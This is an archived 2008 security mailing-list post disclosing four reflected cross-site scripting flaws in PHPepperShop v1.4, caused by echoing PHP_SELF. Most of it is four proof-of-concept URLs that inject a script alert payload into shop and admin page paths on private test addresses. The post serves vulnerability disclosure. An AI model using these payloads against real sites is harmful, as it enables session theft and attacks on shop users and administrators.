|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
XSS in PHPepperShop v 1.4
th3.r00k.ieatpork
gmail.pork.com
Date: Sun Dec 07 2008 - 21:48:39 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Vulnerable Version:PHPepperShop v 1.4
Homepage:http://www.phpeppershop.com
This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF]
http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script>
http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E
http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E
http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]